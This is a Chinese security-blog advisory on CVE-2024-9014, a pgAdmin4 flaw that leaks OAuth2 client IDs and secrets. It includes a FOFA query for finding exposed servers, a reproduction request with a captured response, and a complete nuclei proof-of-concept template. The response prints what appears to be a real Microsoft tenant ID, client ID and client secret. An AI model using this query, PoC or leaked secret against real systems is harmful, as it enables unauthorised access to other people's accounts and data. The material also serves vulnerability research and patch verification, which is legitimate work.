CVE-2024-9014

admin
admin
admin
138635
文章
114
评论
2024年10月7日23:22:27评论45 views字数 3872阅读12分54秒阅读模式

使

01

漏洞名称

pgAdmin4 OAuth2 client ID与secret敏感信息泄漏漏洞

02

漏洞影响

pgAdmin4  8.9-3.fc40

pgAdmin4  8.12-1.fc41

CVE-2024-9014

03

漏洞描述

pgAdmin4 是开源数据库 PostgreSQL 的图形管理工具。2024年互联网上披露 CVE-2024-9014 pgAdmin 4 OAuth2 client ID与secret敏感信息泄漏漏洞。攻击者可构造恶意请求获取客户端ID和密钥,从而导致未经授权访问其他用户数据。官方已发布安全更新,建议升级至最新版本。

04

FOFA搜索语句
icon_hash="1502815117"

CVE-2024-9014

05

漏洞复现

向靶场发送如下数据包

GET /login?next=/ HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27Connection: closeAccept-Encoding: gzip

响应如下

HTTP/1.1 200 OKConnection: closeContent-Security-Policy: default-src ws: http: data: blob: 'unsafe-inline' 'unsafe-eval';Content-Type: text/html; charset=utf-8Date: Mon, 07 Oct 2024 09:28:35 GMTServer: gunicornSet-Cookie: pga4_session=363dd09a-fee5-403e-8e8f-d55680b3f182!eZ4oYiB5uSYYlK/N7KtvaLk4R1o5eKkz48mHvSualtk=; Expires=Tue, 08 Oct 2024 09:28:35 GMT; HttpOnly; Path=/; SameSite=LaxVary: Accept-EncodingX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=block<!DOCTYPE html>...<script type="application/javascript">            try {    require(        ['security.pages'],        function() {            window.renderSecurityPage('login_user', {"authSources": ["oauth2", "internal"], "authSourcesEnum": {"KERBEROS": "kerberos", "OAUTH2": "oauth2"}, "csrfToken": "ImY1NzA1ZmZkMWYzNDAyYzg1ZmU2ZGE5OTE3NDhhOTU1ZTBiOWM2Yzki.ZwOpww.lo_Rs3jMAy_gm5G4_Z6c-q7ISdc", "forgotPassUrl": "/browser/reset_password", "langOptions": [{"label": "English", "value": "en"}, {"label": "Chinese (Simplified)", "value": "zh"}, {"label": "Czech", "value": "cs"}, {"label": "French", "value": "fr"}, {"label": "German", "value": "de"}, {"label": "Indonesian", "value": "id"}, {"label": "Italian", "value": "it"}, {"label": "Japanese", "value": "ja"}, {"label": "Korean", "value": "ko"}, {"label": "Polish", "value": "pl"}, {"label": "Portuguese (Brazilian)", "value": "pt_BR"}, {"label": "Russian", "value": "ru"}, {"label": "Spanish", "value": "es"}], "loginBanner": "", "loginUrl": "/authenticate/login", "oauth2Config": [{"OAUTH2_API_BASE_URL": "https://graph.microsoft.com/oidc/userinfo", "OAUTH2_AUTHORIZATION_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/oauth2/v2.0/authorize", "OAUTH2_BUTTON_COLOR": "#0000ff", "OAUTH2_CLIENT_ID": "91a5b302-7076-4ab8-ae36-8ce782204f2f", "OAUTH2_CLIENT_SECRET": "5uE8Q~3RDpIEk2LfpFttHtBFtdfDMXF-aAKcDa5h", "OAUTH2_DISPLAY_NAME": "Microsoft", "OAUTH2_ICON": "fa-microsoft", "OAUTH2_NAME": "microsoft", "OAUTH2_SCOPE": "openid email", "OAUTH2_SERVER_METADATA_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/v2.0/.well-known/openid-configuration", "OAUTH2_TOKEN_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/oauth2/v2.0/token", "OAUTH2_USERINFO_ENDPOINT": "userinfo"}], "userLanguage": "en"},                {"messages": []});        }, function() {            console.log(arguments);

其中包含敏感信息,漏洞复现完成

06

nuclei poc

poc文件内容如下

id: CVE-2024-9014info:  name: pgAdmin 4 - Authentication Bypass  author: s4e-io  severity: critical  description: |    pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.  reference:    - https://github.com/EQSTLab/CVE-2024-9014    - https://github.com/pgadmin-org/pgadmin4/issues/7945    - https://nvd.nist.gov/vuln/detail/CVE-2024-9014  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H    cvss-score: 9.9    cve-id: CVE-2024-9014    cwe-id: CWE-522    epss-score: 0.00043    epss-percentile: 0.09595  metadata:    verified: true    max-request: 1    vendor: pgadmin-org    product: pgadmin4    fofa-query: "pgadmin4"  tags: cve,cve2024,pgadmin,exposure,auth-bypasshttp:  - raw:      - |        GET /login?next=/ HTTP/1.1        Host: {{Hostname}}    matchers-condition: and    matchers:      - type: regex        part: body        negative: true        regex:          - 'OAUTH2_CLIENT_SECRET": null'      - type: word        part: body        words:          - '<title>pgAdmin 4</title>'          - 'OAUTH2_CLIENT_SECRET'        condition: and      - type: status        status:          - 200

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-9014

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日23:22:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-9014https://cn-sec.com/archives/3238176.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息